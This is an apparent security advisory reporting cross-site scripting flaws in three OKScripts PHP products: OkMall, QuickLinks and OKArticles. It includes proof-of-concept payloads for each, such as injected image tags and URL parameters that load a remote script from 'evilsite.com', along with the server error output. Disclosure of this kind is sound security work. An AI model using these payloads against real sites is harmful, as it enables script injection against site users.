OkMall v1.0
Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easily evade this. ForPoC try putting a [imgsrc=lol.jpg]in the search box. XSS vuln via URLinjection with possible buffer overflow?: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] The above PoC creates the error msg: Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59 Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60 Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61 and continuously outputs feof() and fread() error messages on the page. Buffer overflow? ------------------------ QuickLinks v1.1 Homepage: http://www.okscripts.com/ Effected files: cat.php XSS Vulnerabilities: The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(XSS)] in the search box. XSS vuln via URL injection: http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] -------------------------------------- OKArticles v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesnt properally filter using input before generating it. Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(XSS)] in the search box. XSS vuln via URL injection: http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
